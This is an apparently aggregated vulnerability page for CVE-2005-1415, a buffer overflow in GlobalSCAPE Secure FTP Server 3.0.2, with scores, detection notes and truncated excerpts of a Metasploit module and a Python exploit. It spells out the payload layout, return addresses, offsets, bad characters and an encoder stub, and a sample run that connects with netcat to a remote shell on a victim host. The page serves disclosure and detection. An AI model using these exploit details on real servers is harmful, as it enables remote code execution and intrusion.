CVE-2005-1415
published 2005-05-03CVE-2005-1415: Buffer overflow in GlobalSCAPE Secure FTP Server 3.0.2 allows remote authenticated users to execute arbitrary code via a long FTP command.
PriorityP354critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
60.46%
99.0th percentile
Buffer overflow in GlobalSCAPE Secure FTP Server 3.0.2 allows remote authenticated users to execute arbitrary code via a long FTP command.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| globalscape | secure_ftp_server | — | — |
| globalscape | secure_ftp_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff
bytes↗
\x41*2043 + \x7C\x4F\xED\xBB + \x90*36 + shellcode
- →Buffer overflow is triggered by sending an oversized FTP command (2043+ bytes) after authentication; detect abnormally long FTP command payloads exceeding 2043 bytes on port 21. ↗
- →Exploit requires a valid authenticated FTP session (or anonymous access); monitor for FTP logins immediately followed by anomalously large single-command payloads. ↗
- →The shellcode prepend encoder stub \xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff appears at the start of the payload; scan FTP traffic for this byte sequence. ↗
- →The exploit targets GlobalSCAPE Secure FTP Server versions prior to 3.0.3; fingerprint the FTP banner for versions 3.0, 3.0.1, or 3.0.2 as high-risk targets. ↗
- →FTP banner '220 GlobalSCAPE Secure FTP Server (v. 3.0)' identifies a vulnerable unpatched instance; alert on this banner string. ↗
- →BadChars for the payload are null bytes, spaces, and lowercase ASCII (0x61-0x7a); the payload will be entirely uppercase/numeric alphanumeric encoded — detect FTP commands containing only uppercase alphanumeric characters of unusual length. ↗
- ·The standalone Python exploit hardcodes the return address 0x7C4FEDBB, while the Metasploit module uses 0x1002f01f; different builds/patches of the target may require different return addresses. ↗
- ·The overflow offset is 2043 bytes; the payload space available in the Metasploit module is 1000 bytes after the NOP sled. ↗
- ·The exploit only works against Windows targets; the Metasploit module platform is restricted to 'win'. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
GlobalScape Secure FTP Server - Input Overflow (Metasploit)
exploitdb·2010-10-05
CVE-2005-1415 GlobalScape Secure FTP Server - Input Overflow (Metasploit)
GlobalScape Secure FTP Server - Input Overflow (Metasploit)
---
##
# $Id: globalscapeftp_input.rb 10559 2010-10-05 23:41:17Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'GlobalSCAPE Secure FTP Server Input Overflow',
'Description' => %q{
This module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server.
All versions prior to 3.0.3 are affected by this flaw. A valid user account (
or anonymous access) is required for this exploit to work.
},
'Author' => [ 'Fairuzan Roslan ', 'Mati Aharoni ' ],
'License' => BSD_LICENSE,
'
Exploit-DB
GlobalScape Secure FTP Server 3.0 - Remote Buffer Overflow
exploitdb·2005-05-01
CVE-2005-1415 GlobalScape Secure FTP Server 3.0 - Remote Buffer Overflow
GlobalScape Secure FTP Server 3.0 - Remote Buffer Overflow
---
#!/usr/bin/python
###############################################
# GlobalScape Secure FTP Server Buffer Overflow
# Coded by [email protected]
# http://www.see-security.com
# http://www.hackingdefined.com/exploits/Globalscape30.pdf
###############################################
# EIP Overwrite
# root@[muts]# ./globalscape-3.0-ftp.py
#
# [+] Evil GlobalFTP 3.0 Secure Server Exploit
# [+] Coded by mati [at] see-security [dot] com
# [+] 220 GlobalSCAPE Secure FTP Server (v. 3.0) * UNREGISTERED COPY *
#
# [+] Sending Username
# [+] Sending Password
# [+] Sending evil buffer
# [+] Connect to port 4444 on victim Machine!
#
# root@[muts]# nc -v 192.168.1.153 4444
# [192.168.1.153] 4444 (?) open
# Microsoft Windows 2000 [Version
Metasploit
GlobalSCAPE Secure FTP Server Input Overflow
metasploit
GlobalSCAPE Secure FTP Server Input Overflow
GlobalSCAPE Secure FTP Server Input Overflow
This module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server. All versions prior to 3.0.3 are affected by this flaw. A valid user account ( or anonymous access) is required for this exploit to work.
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0674.htmlhttp://www.cuteftp.com/gsftps/history.asphttp://www.securityfocus.com/bid/13454http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0674.htmlhttp://www.cuteftp.com/gsftps/history.asphttp://www.securityfocus.com/bid/13454
2005-05-03
Published